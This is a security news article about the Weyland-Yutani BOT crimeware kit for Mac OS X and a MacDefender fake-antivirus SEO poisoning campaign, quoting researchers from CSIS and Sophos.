Mac OS X Hit By Crimeware Kit, SEO Poisoning Attack

Danish security firm CSIS Security Group has identified what it says is the first DIY crimeware kit aimed at the Mac OS X platform, CSIS said on Monday.

In addition, a massive search-engine-based attack using search terms related to topics such as global warming and the death of Osama bin Laden is targeting Mac as well as Windows users, according to Sophos. Both incidents are a sign of Apple software’s growing importance, security researchers said.

Cautious release

CSIS said the crimeware kit, called Weyland-Yutani BOT, has been announced so far on a few “closed underground forums”.

“Detailed information about this crimeware kit is not being leaked publicly and the authors of the kit are obviously trying to stay below the radar allowing only vetted users of the forums to see most of the content,” said CSIS’s Peter Kruse in a blog post.

Crimeware kits are used to build malicious software that can be used to grab passwords or other sensitive information, with examples including the notorious Zeus and Spyeye malware. Kruse said Weyland-Yutani BOT is a “form grabber” which, like similar kits designed for Windows, consists of a builder and an admin panel and supports encryption.

“Apparently, a dedicated iPad and Linux release are under preparation as well,” Kruse stated. “The Weyland-Yutani BOT supports web injects and form grabbing in Firefox; however both Chrome and Safari will soon follow. The webinjects templates are identical to the ones used in Zeus and Spyeye.”

CSIS said it has videos demonstrating the admin panel and builder and showing that the software appears to be fully operational. The kit is selling for 1,000 units of WebMoney, an online payment system operated by WM Transfer Ltd.

Kruse said the existence of the crimeware kit demonstrates that more malicious software is on the way for Mac OS X and iOS systems, and could catch them off guard.

“CSIS finds this crimekit to be quite disturbing news since MacOS previously to some degree has been spared from the increasing amount of malware which has haunted Windows-based systems for years,” Kruse wrote. “This could have resulted in a false sense of security that might make Mac OS users especially vulnerable to a sudden and highly sophisticated attack.”

SEO poisoning

Meanwhile, the “massive” search engine poisoning attack hits users with fake anti-virus programs, delivering payloads onto OS X systems, according to a Sophos blog post.

The attack uses social engineering techniques to persuade users that a scan of their system has uncovered a serious infection, in order to persuade them to install fake antivirus software, Sophos said.

“In a similar social engineering trick as we have seen in Windows fake scanners it pretends to be a legitimate Mac anti-virus program called MacDefender,” wrote Sophos’ Chester Wisniewski.

“It uses a lot of social engineering including redirecting your browser to rather offensive porn sites, although it does not appear they are doing this to make money, simply to imply that you are infected. It also uses scare tactics like your credit card data being at risk. The reality is that your credit card is only at risk if you actually try to purchase the fake software,” Wisniewski wrote.